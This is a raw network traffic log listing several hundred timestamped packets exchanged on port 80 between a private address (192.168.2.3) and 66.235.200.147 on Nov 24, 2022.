Nov 24, 2022 12:20:03.477483034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477502108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477516890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477529049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477557898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477576971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477585077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477611065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477612972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477612972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477638006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477638960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477658987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477667093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477677107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477694988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477722883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477735043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477751017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477763891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477780104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477793932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477808952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477817059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477838039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477847099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477868080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477879047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477895975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477909088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477925062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477952957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.477960110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477972984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.477982044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478007078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478009939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478020906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478038073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478049040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478068113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478096962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478110075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478127956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478140116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478157043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478169918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478184938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478214025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478225946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478240967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478257895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478269100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478287935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478296041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478302002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478323936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478341103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478352070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478363037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478379965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478398085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478409052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478423119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478437901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478444099 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478466034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478493929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478506088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478521109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478534937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478552103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478564978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478580952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478610992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478622913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478638887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478652954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478668928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478693008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478694916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478718996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478724957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478739977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478753090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478768110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478781939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478791952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478810072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478820086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478837967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478866100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478883028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.478961945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.478995085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479013920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479022026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479037046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479048967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479063988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479077101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479083061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479103088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479129076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479145050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479156971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479173899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479183912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479206085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479211092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479221106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479239941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479248047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479268074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479295015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479310989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479322910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479338884 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479350090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479372978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479377985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479388952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479404926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479417086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479433060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479459047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479474068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479485989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479505062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479513884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479530096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479541063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479551077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479568005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479594946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479607105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479624987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479636908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479652882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479670048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479681015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479706049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479707956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479732037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479754925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479774952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479783058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479804039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479809999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479835033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479836941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479851007 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479865074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479870081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479892969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479922056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479932070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479949951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479963064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.479978085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.479990959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480006933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480035067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480050087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480062962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480074883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480089903 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480108023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480118990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480145931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480146885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480164051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480175972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480184078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480202913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480232000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480246067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480258942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480272055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480285883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480303049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480314016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480319023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480341911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480360985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480370998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480387926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480398893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480407953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480424881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480444908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480452061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480474949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480480909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480493069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480509043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480535984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480549097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480562925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480576992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480591059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480606079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480618954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480634928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480648994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480654955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480678082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480701923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480705976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480734110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480736971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480753899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480761051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480777025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480787992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480799913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480817080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480843067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480844975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480856895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480871916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480881929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480901003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480911016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480930090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480950117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480957985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480977058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.480986118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.480998993 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481024027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481053114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481066942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481081009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481095076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481108904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481123924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481138945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481149912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481163979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481189966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481204033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481214046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481219053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481246948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481247902 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481275082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481276035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481296062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481303930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481313944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481333971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481348038 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481362104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481375933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481391907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481399059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481420994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481430054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481451035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481458902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481479883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481498003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481508017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481524944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481534958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481545925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481563091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481578112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481590033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481600046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481616974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481626034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481645107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481673956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481686115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481703043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481714964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481734037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481745005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481760979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481771946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481789112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481800079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481818914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481828928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481846094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481856108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481874943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481884956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481904984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481913090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481935978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481955051 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481965065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.481988907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.481996059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482007027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482024908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482052088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482069016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482079029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482080936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482110977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482111931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482139111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482140064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482158899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482167006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482178926 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482193947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482204914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482223034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482232094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482251883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482259989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482280016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482309103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482330084 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482336044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482350111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482364893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482377052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482393026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482398033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482420921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482448101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482461929 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482475996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482487917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482503891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482517004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482531071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482538939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482561111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482579947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482588053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482616901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.482621908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.482641935 CET	49710	80	192.168.2.3	66.235.200.147
